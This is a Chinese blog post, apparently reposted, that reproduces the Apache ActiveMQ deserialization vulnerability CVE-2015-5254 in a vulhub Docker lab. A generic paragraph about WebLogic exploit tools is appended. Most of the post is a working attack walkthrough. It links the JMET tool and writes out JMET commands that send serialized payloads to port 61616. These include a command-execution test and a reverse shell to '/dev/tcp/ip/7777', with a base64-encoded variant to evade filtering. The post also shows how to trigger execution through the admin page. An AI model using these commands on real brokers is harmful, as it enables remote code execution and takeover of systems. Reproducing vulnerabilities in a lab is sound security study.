反序列化漏洞利用工具_ActiveMQ反序列化漏洞复现

1ae4182ef5166868f19dc0a13dd052bf.png

ActiveMQ反序列化漏洞复现(CVE-2015-5254)

前言:

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。

漏洞描述:

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

使用vulhub进行搭建漏洞环境

# 进入某一个漏洞/环境的目录cd  activemq/CVE-2015-5254/# 启动运行环境docker-compose -up -d

漏洞复现:

1. 构造(可以使用ysoserial)可执行命令的序列化对象
2. 作为一个消息,发送给目标61616端口
3. 访问web管理页面,读取消息,触发漏洞的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

工具:JMET

使用详情:

https://github.com/matthiaskaiser/jmet

下载地址:

https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

创建队列消息并写入命令。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME ip  61616

5848b42678489789e8f28c59a7873cfd.png

进入容器转到/tmp目录下,发现没有创建文件,这是因为当执行命令后会给目标的ActiveMQ添加一个名为event 的队列,通过访问

http://ip:8161/admin/browse.jsp?JMSDestination=event

看到这个队列中所有的消息。

#列出所有在运行的容器信息。docker ps#进入容器docker exec -it  cc0e9385f975  /bin/bash

e9b90eab523fbcd8c1d492f51a6c7825.png

点击触发后,执行命令。

5a16b47adbdbfc011caac55c0493762b.png

命令执行成功。

fb829fe523520c75fa89ca0655ef9417.png

反弹shell

直接反弹时无法成功。可以通过base64进行反弹。

无法反弹。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/ip/7777 0>&1" -Yp ROME  ip 61616

base64绕过。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo payload的basse64编码}|{base64,-d}|{bash,-i}" -Yp ROME  ip 61616

5601cdc4adc2ffccbe7859d23527a38c.png

aff83dd6ff12d09671a6c730093b9407.png

反弹成功。

ee38302c0ba8163b830895bf6cc9a1a5.png

影响版本

        Apache ActiveMQ <5.13.x

修复建议

        升级到最新版本

a4dd4bbeedf01ffe3c8a19b1ab48d218.png

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebLogic是一种Java EE应用服务器,被广泛用于企业级应用程序的开发和部署。然而,WebLogic也存在反序列化漏洞,这是一种安全漏洞,可能被恶意攻击者利用来执行远程命令或注入恶意代码。 为了利用WebLogic反序列化漏洞,攻击者可能会使用各种不同的工具。这些工具可以帮助攻击者发现和利用漏洞,以实现远程执行代码的目的。 一种常用的WebLogic反序列化漏洞利用工具是ysoserial。该工具可以生成不同类型的恶意Payload,这些Payload可以利用WebLogic的反序列化漏洞执行任意命令或注入恶意代码。攻击者可以使用ysoserial生成有效的Payload,并将其发送给目标WebLogic服务器,从而实现远程执行攻击。 另一个常见的工具是WebLogicScan。该工具用于自动化发现和验证WebLogic反序列化漏洞。它可以扫描目标服务器上的漏洞,并提供漏洞验证和利用的选项。WebLogicScan可以帮助攻击者快速识别潜在的漏洞,以便后续的攻击行动。 WebLogic反序列化漏洞利用工具还包括不同版本的Metasploit框架。Metasploit是一种常用的渗透测试工具,其中包含WebLogic漏洞的模块。攻击者可以使用Metasploit框架中的模块来发现和利用WebLogic漏洞,以执行远程命令或控制目标系统。 总之,WebLogic反序列化漏洞工具是为了发现和利用WebLogic服务器上的安全漏洞,攻击者可能使用ysoserial、WebLogicScan和Metasploit等工具来实现这一目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值